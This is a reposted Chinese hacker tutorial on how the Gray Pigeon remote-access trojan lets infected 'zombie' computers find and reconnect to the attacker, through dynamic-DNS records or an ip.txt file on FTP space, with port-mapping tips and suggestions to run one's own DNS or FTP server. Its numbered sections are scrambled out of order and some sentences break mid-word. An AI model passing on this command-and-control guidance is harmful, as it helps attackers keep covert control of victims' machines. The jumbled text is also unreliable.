FTP上线配置比较麻烦,使用也一样,要手动更新ip.txt文件信息,如果有变动要重新更新到FTP空 间
5:万一FTP服务器和域名服务器都不可用,那就不能控制了,所以除了这个2种上线方式还有其他办法吗
有,肉鸡找服务器的困难就是无法确定和找到服务器的IP,所以只要肉机能直接访问公网上的某个文件或信息,然你只要把信息写成你的IP就行了.
还有F
TP服务
2:FTP上线原理:当你配置灰鸽子自动上线一项时,就是FTP专用上线方法,你可以看到他的窗口的标题栏里写了"FTP更新IP"字符,在这里同样要求你输入空间的UID和PWD,而且还有且必须一个ip.txt文件,为什么呢,这个也是和动态域名上线不同点,那就是肉机访问域名和FTP空间必须知道你的IP地址信息,可是这个信息保存在哪里呢,如果是动态域名,那么他就直接保存到数据库里面了.所以你只要直接查就可以查出来,但是FTP空间是没有提供这个数据库给你的,所以你必须的弄个东西来保存你的这个IP地址的信息,那就是要求有个ip.txt文件了,对于这个ip.txt文件先说清楚了,有2个.一个是放在FTP空间里的;通过自动更新可以直接写进你的IP信息,还有一个就是在你自己电脑上面也要有个ip.txt文件,保存在FTP目录(开通本地的FTP服务时指定的FTPwk;同时要手动添加你的IP信息(例:202.103.96.68:8000;IP地址是你的公网IP不是内网,端口是你开的端口,如果是内网影射的话端口要一致),然后在配置自动上线时会将你的本地的ip.txt文件里的IP信息更新到FTP空间里的ip.txt文件里面.我们可以看到按纽上面写着"更新IP到FTP空间".这样你存在你申请的FTP空间里的IP.TXT文件就有你现在的IP的端口信息了.这样你的肉鸡就会根据你生成的时候填写的FTP空间级文件名和路径进行查找你的FTP空间里的文件,这样他就能知道并连接你现在的IP地址了,就能控制他了.
转载:
大家好,我是黑客小林,今天给大家带来的是 灰鸽子抓肉鸡上线原理,动态域名与FTP的区别,这也是很多学员还没弄懂的地方,今天我会给大家解释一下。
简介:灰鸽子上线/内网上线的教程在网上很多,五花八门,看多了越来越头痛.导致有很多朋友都被误导,"灰鸽子的配置真他妈的难".....今天我本人对灰鸽子上线原理进行讲解一下.
其实灰鸽子上线的原理很简单;配置也简单.灰鸽子上线自带2中方法,第1是FTP,第2是动态域名,大家在网上看到的教程都不大详细清楚,都配置了2样.我本人对这个也搞了好久,到最后得出一个经验,想知道灰鸽子内网上线怎么配置,大家只要知道灰鸽子上线的原理就很简单了.真的很简单.灰鸽子上线的2中方法的目的就是,让肉鸡找到你的IP地址,而且这个IP要直接是公网IP,如果你是内网的话就需要映射了这个端口影射在路由里面设置,但是这个端口要和你的灰鸽子配置的端口一样,来指向你的内网IP
动态域名上线环境:1:你申请的域名服务器可用/功能正常
2:需要安装域名服务器的客户端支持/并更新
3:申请域名是的UID和PWD正确
4:你的IP是公网IP,如果不是请看下面的内网映射原理
疑惑 :看教程都要配置有ip.txt文件,那是FTP上线需要的这个是动态域名是不需要的
疑惑: 要配置有ip.txt文件,FTP上线需要个ip.txt文件,而且是2个,你 本机一 个,FTP服务器里面一个.而且在生成木马是一定要写对路径和文件名 如 http://你的FTP空间名称/ip.txt(ip.txt文件的路径根据服务器和你决定)
3:域名上线和FTP上线的异同
FTP上线环境: 1:你申请的FTP服务器可用/功能正常
2:需要在本地开通FTP服务并且指定文件路径/并更新你的变动IP信息
3:申请域名是的UID和PWD正确
4:你的IP是公网IP,如果不是请看下面的内网映射原理
何为"映射"呢,土一个点比方;映射就是将一个东西A直接指向另外一个东西B,当你要访问B时你就只要访问A,那么A就会将你的东西告诉B了,所以你就能和B交流了,在实际过程中A就相当于公有IP(公网),B就相当于私有IP(内网/一帮是C类地址)
为什么要"映射"呢,IP分为公有IP和私有IP,能在互联网上相互访问的只有公有IP,就是电信给我们的IP ,就是猫里面的IP,私有IP就是我们内部IP,所以公网上的IP不能直接访问我们内部的IP,而要通过我们自己的公有IP才能访问内部IP,这样我们就需要映射,需要将我们公有IP里影射一个端口或服务到我们自己的内部IP,这样公网上的IP才能访问我们内部的IP.所以肉鸡才能找到我们.
动态域名上线是通过域名服务器里的数据库来保存你的IP信息,肉鸡直接查找
FTP上线是通过FTP空间里的ip.txt文件里的IP信息进行查找
4:域名上线和FTP上线的优缺点
动态域名上线配置简单,使用方便,只要安装客户端,自
动更新IP.
方法1: 你自己做个DNS服务器进行IP解析(生成木马的时候填写你的就是了)
方法2: 你自己做个FTP服务器进行IP信息存储(生成木马的时候填写你的就是了)
方法3: 重新破解灰鸽子,进行功能增加,网页的数据
5:内网映射原理:
1:动态域名上线原理:当在你生成服务器的时候会要求你填写木马访问的域名服务器和登陆用户和密码(在网站上申请),然后这个在域名服务器上就有你的IP,你的这个IP地址是动态域名服务器里会有一个数据库进行记录的.你的IP随便变,但是这个域名是不会变的,所以只要木马一查这个网站(域名)并用你的ID登陆,他就知道你现在的IP,因为里面记录了你的当前IP.但是有一个问题,如果你的IP变了,那木马还去域名服务器的数据库的你的ID号的IP地址单元里面查的话那就查不到你真的IP了,所以动态域名需要一个客户端软件支持,这样他会每隔几分钟更新下你自己的IP,这样就算你的IP变了最多迟5或10分钟,(时间在软件里面可以设置)他就会去域名服务器更新你的IP,这样肉鸡就能找到你现在的IP就能连上你."动态"就是域名不变,你的IP随便变 都能找到你.有不清楚的就学学DNS域名解析服务原理就知道了,你申请ID的那个网站其实是一台DNS服务器